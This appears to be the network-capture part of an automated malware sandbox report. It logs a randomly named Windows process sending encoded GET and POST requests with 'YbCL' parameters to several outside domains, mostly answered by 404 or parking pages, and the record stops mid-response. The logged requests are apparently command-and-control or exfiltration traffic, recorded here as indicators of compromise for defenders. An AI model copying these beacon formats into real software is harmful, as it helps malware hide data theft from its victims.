                                          Data Ascii: YbCL=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4XZY6WMELCLd5ovk5Lh1oVAOCFvxiPkagwO5xzNRgLr8AaDnbqIR+cz7gZfa1+Pjv+mQaJoljOCpTz4MtDN7K1Awg78y6bbrQyVSnC8wxPy+SHD4IvMFqHbiBUTKP22ARUzPtvAYfneSRm1PPcjYCXmBKT4ojzN1OrCTKcNiw28uMcN6/S8/p54UDYxJJPkNuNJ+0CCKS/2cEvWWOQ+2Bz1HDCPREvq/7/xesgmbu150oZ5ENcARpKezrCUcyRNl4sYApmNiJasWN6s60iN6u01dr6rTUmDAX5sxPp3UuTC6FcQXzF/5wsvGZostbh71MAweh6LQmJIrN32y/CO5D3fSwX6mKu7KoomL8pbXhgFkS/UtQid2R6b47fxJgVXMoGBAljJ7hTQh8syeNZmgLi9EsjDuzWYZi4dOGmfcEgRAcjMHDmHxGSteyh0fIh1Er1ukgRL8R4cJAq4ELeF2CKNJLF1J5TzT3afJlY8ThacArg8NLk/V44M721shevVitOuPZdNKn5mTnJcMaKVvXj9lf2QQHtO67k17IameJXb9djJMz1y7h6J6M1/d7kLEAF8/IJlmDwz6qXbKnY5/Wo+lxHl7u/JxmRsmFkcpSmgR9HjMPomm4n/LLp+DssBAXyNBGD+VKfUxyj+SqWtKE2qg8Hg7+7HPFD4u91ddkAhj3ANFqos8YZ/rM0XyiYiu0wcU9AYIAr0551t8hqsgT/p0DELYorbsb31+jG2Wu3bc3mvQdf5G5yKGlGJ3XcdG3hvfy16H2x4rnfQXx7xBC6kv86K3WSsX/dorcc1ozfA7FomyaEwNKhM8Xjz/OG5Z0XPzifKqeGaUGObXy0OA5ylTLL6A2KRUcXe7gwIjZosj0FzAC+nxa1+LOuSZ49Eryy9gDLaCnNUQ6RU6ipLwwOfxGYMhZvDdlnxNmchMu2wfGd9U4fjP4QtRXPd6NccW/Sw7fx [TRUNCATED]
                                          Jul 4, 2024 16:52:58.071453094 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Date: Thu, 04 Jul 2024 14:52:57 GMT
                                          Server: Apache
                                          Content-Encoding: gzip


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          4 | 192.168.2.7 | 49708 | 217.160.0.106 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:52:59.856486082 CEST | 534 | OUT | GET /qe66/?YbCL=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv+z+o+Zy5RZ1L4zwBfly91+2hSvhVojey3gmTZ6j57PRX7U3n66rWnGeG&fhW=BLvXr6e0EhyxeX HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.catherineviskadi.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:53:00.517497063 CEST | 770 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Content-Length: 626
                                          Connection: close
                                          Date: Thu, 04 Jul 2024 14:53:00 GMT
                                          Server: Apache
                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          5 | 192.168.2.7 | 49712 | 208.91.197.27 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:53:22.021315098 CEST | 802 | OUT | POST /xzzi/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.bfiworkerscomp.com
                                          Origin: http://www.bfiworkerscomp.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.bfiworkerscomp.com/xzzi/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Ascii: YbCL=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDb2DDQSjT0StY9WkHvCXiImIh1Bu2eQW7f5ZOtGx2trxMOvKPg==


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          6 | 192.168.2.7 | 49713 | 208.91.197.27 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:53:24.553352118 CEST | 822 | OUT | POST /xzzi/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.bfiworkerscomp.com
                                          Origin: http://www.bfiworkerscomp.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.bfiworkerscomp.com/xzzi/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Ascii: YbCL=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78Zezl3lYh4Nj5e9BDPyQpaObBcOOZQFGz5jOTol3sVhCFCyqMO4=


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          7 | 192.168.2.7 | 49714 | 208.91.197.27 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:53:27.088635921 CEST | 1835 | OUT | POST /xzzi/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.bfiworkerscomp.com
                                          Origin: http://www.bfiworkerscomp.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.bfiworkerscomp.com/xzzi/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          8 | 192.168.2.7 | 49715 | 208.91.197.27 | 80 | 6404 | C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Jul 4, 2024 16:53:29.616545916 CEST | 532 | OUT | GET /xzzi/?fhW=BLvXr6e0EhyxeX&YbCL=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/T4RMdgNWnwSdCIYHgMQCJ4NovZBdigdGOlTiGNjGNRbnTmMSUCfOcFfR HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.bfiworkerscomp.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:53:30.541063070 CEST | 1236 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 04 Jul 2024 14:53:20 GMT
                                          Server: Apache
                                          Set-Cookie: vsid=927vr467650400251865281; expires=Tue, 03-Jul-2029 14:53:20 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly
                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Z5RlH6byuPGt3GizcKQdqpzG98LJc4q5dv5mH3BEJys8KMJxm4ZQCUsA9bPyV0P/Nlj0q4oRj5Vz7Zu9oqLzBw==
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Data Ascii: a22b<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="c
                                          Jul 4, 2024 16:53:30.541084051 CEST | 1236 | IN | response body continues (minified consentmanager.net CMP loader script, content not shown)
                                          Jul 4, 2024 16:53:30.541098118 CEST | 1236 | IN | response body continues (minified script, content not shown)
                                          Jul 4, 2024 16:53:30.541125059 CEST | 1236 | IN | response body continues (minified script, content not shown)
                                          Jul 4, 2024 16:53:30.541136026 CEST | 859 | IN | response body continues (minified script, content not shown)
                                          Jul 4, 2024 16:53:30.541141033 CEST | 1236 | IN | response body continues (minified script, content not shown)
                                          Jul 4, 2024 16:53:30.541145086 CEST | 1236 | IN | response body continues (minified script, content not shown)
                                          Jul 4, 2024 16:53:30.541151047 CEST | 1236 | IN | response body continues (minified script, content not shown)
                                          Jul 4, 2024 16:53:30.541419983 CEST | 672 | IN | response body continues (minified script, content not shown)
                                          Jul 4, 2024 16:53:30.541433096 CEST | 1236 | IN | response body continues (minified script, content not shown)
                                          Jul 4, 2024 16:53:30.546256065 CEST | 1236 | IN | end of the CMP script, followed by: <meta name="tids" content="a='29620' b='33565' c='bfiworkerscomp.com' d='entity_mapped'" /><title>Bfiworkerscomp.com</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          9           192.168.2.7  49716        43.252.167.188  80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp                            Bytes transferred  Direction  Data
                                          Jul 4, 2024 16:53:44.361553907 CEST  808  OUT  POST /rm91/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.xn--fhq1c541j0zr.com
                                          Origin: http://www.xn--fhq1c541j0zr.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Ascii: YbCL=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPRZ3DMWkQTkNbCMkPmw+Sxyo12UmG8EoRBAqDCNqrGlPyaD70Q==
                                          Jul 4, 2024 16:53:45.284420013 CEST  367  IN  HTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:59:27 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          10          192.168.2.7  49717        43.252.167.188  80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp                            Bytes transferred  Direction  Data
                                          Jul 4, 2024 16:53:46.900096893 CEST  828  OUT  POST /rm91/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.xn--fhq1c541j0zr.com
                                          Origin: http://www.xn--fhq1c541j0zr.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Ascii: YbCL=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgKTx0wQRaZdTAEyOg5L0xAl/Ii/ivX/c//176guYG6abgfh0j8=
                                          Jul 4, 2024 16:53:47.793884993 CEST  367  IN  HTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:59:29 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          11          192.168.2.7  49718        43.252.167.188  80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp                            Bytes transferred  Direction  Data
                                          Jul 4, 2024 16:53:49.450368881 CEST  1841  OUT  POST /rm91/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.xn--fhq1c541j0zr.com
                                          Origin: http://www.xn--fhq1c541j0zr.com
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:53:50.636241913 CEST  367  IN  HTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:59:32 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          12          192.168.2.7  49719        43.252.167.188  80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp                            Bytes transferred  Direction  Data
                                          Jul 4, 2024 16:53:51.995414972 CEST  534  OUT  GET /rm91/?fhW=BLvXr6e0EhyxeX&YbCL=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WH8ALvnjmtlYhpciewdwpfxiI173pYZLp0P/Ncxt8Rkrw2XK7hs/fa/r1 HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.xn--fhq1c541j0zr.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:53:52.998866081 CEST  367  IN  HTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:59:35 GMT
                                          Server: Apache
                                          Content-Length: 203
                                          Connection: close
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          13          192.168.2.7  49720        194.9.94.85     80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp                            Bytes transferred  Direction  Data
                                          Jul 4, 2024 16:53:58.144607067 CEST  808  OUT  POST /4hda/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.xn--matfrmn-jxa4m.se
                                          Origin: http://www.xn--matfrmn-jxa4m.se
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Ascii: YbCL=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2XM6HfcY/Fsy+P6xsmL0jhx2PujKQoCkKEE4jNxJoNHd02JHD1A==
                                          Jul 4, 2024 16:53:58.815129995 CEST  1236  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:53:58 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          X-Powered-By: PHP/8.1.24
                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                          Jul 4, 2024 16:53:58.815161943 CEST  224  IN  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                                          Jul 4, 2024 16:53:58.815172911 CEST  1236  IN  Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                                          Jul 4, 2024 16:53:58.815186024 CEST  1236  IN  Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                                          Jul 4, 2024 16:53:58.815197945 CEST  448  IN  Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                                          Jul 4, 2024 16:53:58.815210104 CEST  1236  IN  Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                                          Jul 4, 2024 16:53:58.815334082 CEST  206  IN  Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          14          192.168.2.7  49721        194.9.94.85     80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Timestamp                            Bytes transferred  Direction  Data
                                          Jul 4, 2024 16:54:00.682084084 CEST  828  OUT  POST /4hda/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.xn--matfrmn-jxa4m.se
                                          Origin: http://www.xn--matfrmn-jxa4m.se
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Ascii: YbCL=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gO0qhum/k5/GF87AT9JSw4e7bmHj6Qtqx2YW1vcwq9oDak8UP8=
                                          Jul 4, 2024 16:54:01.344336987 CEST  1236  IN  HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:54:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          X-Powered-By: PHP/8.1.24
                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                          Jul 4, 2024 16:54:01.344357014 CEST  224  IN  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                                          Jul 4, 2024 16:54:01.344368935 CEST  1236  IN  Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                                          Jul 4, 2024 16:54:01.344461918 CEST  1236  IN  Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                                          Jul 4, 2024 16:54:01.344474077 CEST  1236  IN  Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                                          Jul 4, 2024 16:54:01.344489098 CEST  654  IN  Data Ascii: m_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loopia.se?utm_me


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
15          192.168.2.7  49722        194.9.94.85     80                6404  C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
Timestamp  Bytes transferred  Direction  Data
Jul 4, 2024 16:54:03.217961073 CEST  1841  OUT  POST /4hda/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.xn--matfrmn-jxa4m.se
                                          Origin: http://www.xn--matfrmn-jxa4m.se
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.xn--matfrmn-jxa4m.se/4hda/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Jul 4, 2024 16:54:03.888307095 CEST  1236  IN  HTTP/1.1 200 OK
                                          Server: nginx
